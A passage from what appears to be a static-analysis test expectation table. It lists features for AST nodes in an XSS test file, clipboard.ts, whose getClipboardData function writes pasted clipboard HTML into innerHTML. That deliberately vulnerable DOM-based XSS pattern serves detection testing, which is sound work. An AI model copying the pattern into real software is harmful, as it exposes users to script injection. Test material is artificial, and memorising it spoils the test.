droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:58:33:58:33 | e | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:58:33:58:33 | e | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:58:33:58:33 | e | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:58:33:58:33 | e | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:60:11:60:19 | dropItems | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:60:11:60:19 | dropItems | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:60:11:60:19 | dropItems | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:60:11:60:19 | dropItems | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:60:11:60:19 | dropItems | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:60:11:60:46 | dropIte ... ring>() | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:60:11:60:46 | dropIte ... ring>() | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:60:11:60:46 | dropIte ... ring>() | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:60:11:60:46 | dropIte ... ring>() | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:60:11:60:46 | dropIte ... ring>() | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:60:11:60:46 | dropItems | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:60:11:60:46 | dropItems | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:60:11:60:46 | dropItems | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:60:11:60:46 | dropItems | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:60:11:60:46 | dropItems | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:60:23:60:46 | exceptional return of new Set ... ring>() | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:60:23:60:46 | exceptional return of new Set ... ring>() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:60:23:60:46 | exceptional return of new Set ... ring>() | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:60:23:60:46 | exceptional return of new Set ... ring>() | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:60:23:60:46 | exceptional return of new Set ... ring>() | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:60:23:60:46 | new Set ... ring>() | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:60:23:60:46 | new Set ... ring>() | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:60:23:60:46 | new Set ... ring>() | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:60:23:60:46 | new Set ... ring>() | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:60:23:60:46 | new Set ... ring>() | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:60:27:60:29 | Set | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:60:27:60:29 | Set | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:60:27:60:29 | Set | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:60:27:60:29 | Set | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:60:27:60:29 | Set | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:63:9:63:9 | e | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:63:9:63:9 | e | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:63:9:63:9 | e | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:63:9:63:9 | e | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:63:9:63:9 | e | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:63:9:63:23 | e.clipboardData | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:63:9:63:23 | e.clipboardData | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:63:9:63:23 | e.clipboardData | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:63:9:63:23 | e.clipboardData | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:63:9:63:23 | e.clipboardData | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:63:9:63:29 | e.clipb ... a.files | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:63:9:63:29 | e.clipb ... a.files | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:63:9:63:29 | e.clipb ... a.files | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:63:9:63:29 | e.clipb ... a.files | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:63:9:63:29 | e.clipb ... a.files | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:63:9:63:36 | e.clipb ... .length | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:63:9:63:36 | e.clipb ... .length | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:63:9:63:36 | e.clipb ... .length | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:63:9:63:36 | e.clipb ... .length | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:63:9:63:36 | e.clipb ... .length | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:63:9:63:40 | e.clipb ... gth > 0 | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:63:9:63:40 | e.clipb ... gth > 0 | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:63:9:63:40 | e.clipb ... gth > 0 | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:63:9:63:40 | e.clipb ... gth > 0 | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:63:9:63:40 | e.clipb ... gth > 0 | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:63:11:63:23 | clipboardData | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:63:11:63:23 | clipboardData | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:63:11:63:23 | clipboardData | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:63:11:63:23 | clipboardData | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:63:11:63:23 | clipboardData | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:63:25:63:29 | files | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:63:25:63:29 | files | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:63:25:63:29 | files | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:63:25:63:29 | files | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:63:25:63:29 | files | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:63:31:63:36 | length | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:63:31:63:36 | length | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:63:31:63:36 | length | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:63:31:63:36 | length | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:63:31:63:36 | length | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:63:40:63:40 | 0 | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:63:40:63:40 | 0 | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:63:40:63:40 | 0 | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:63:40:63:40 | 0 | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:63:40:63:40 | 0 | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:65:16:65:16 | i | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:65:16:65:16 | i | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:65:16:65:16 | i | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:65:16:65:16 | i | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:65:16:65:16 | i | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:65:16:65:20 | i | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:65:16:65:20 | i | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:65:16:65:20 | i | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:65:16:65:20 | i | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:65:16:65:20 | i | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:65:16:65:20 | i = 0 | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:65:16:65:20 | i = 0 | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:65:16:65:20 | i = 0 | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:65:16:65:20 | i = 0 | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:65:16:65:20 | i = 0 | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:65:20:65:20 | 0 | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:65:20:65:20 | 0 | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:65:20:65:20 | 0 | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:65:20:65:20 | 0 | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:65:20:65:20 | 0 | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:65:23:65:23 | i | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:65:23:65:23 | i | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:65:23:65:23 | i | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:65:23:65:23 | i | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:65:23:65:23 | i | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:65:23:65:23 | i | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:65:23:65:23 | i | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:65:23:65:23 | i | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:65:23:65:23 | i | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:65:23:65:23 | i | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:65:23:65:54 | i < e.c ... .length | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:65:23:65:54 | i < e.c ... .length | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:65:23:65:54 | i < e.c ... .length | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:65:23:65:54 | i < e.c ... .length | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:65:23:65:54 | i < e.c ... .length | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:65:27:65:27 | e | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:65:27:65:27 | e | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:65:27:65:27 | e | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:65:27:65:27 | e | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:65:27:65:27 | e | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:65:27:65:41 | e.clipboardData | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:65:27:65:41 | e.clipboardData | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:65:27:65:41 | e.clipboardData | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:65:27:65:41 | e.clipboardData | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:65:27:65:41 | e.clipboardData | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:65:27:65:47 | e.clipb ... a.files | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:65:27:65:47 | e.clipb ... a.files | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:65:27:65:47 | e.clipb ... a.files | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:65:27:65:47 | e.clipb ... a.files | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:65:27:65:47 | e.clipb ... a.files | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:65:27:65:54 | e.clipb ... .length | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:65:27:65:54 | e.clipb ... .length | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:65:27:65:54 | e.clipb ... .length | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:65:27:65:54 | e.clipb ... .length | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:65:27:65:54 | e.clipb ... .length | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:65:29:65:41 | clipboardData | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:65:29:65:41 | clipboardData | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:65:29:65:41 | clipboardData | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:65:29:65:41 | clipboardData | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:65:29:65:41 | clipboardData | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:65:43:65:47 | files | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:65:43:65:47 | files | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:65:43:65:47 | files | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:65:43:65:47 | files | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:65:43:65:47 | files | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:65:49:65:54 | length | contextFunctionInterfaces | 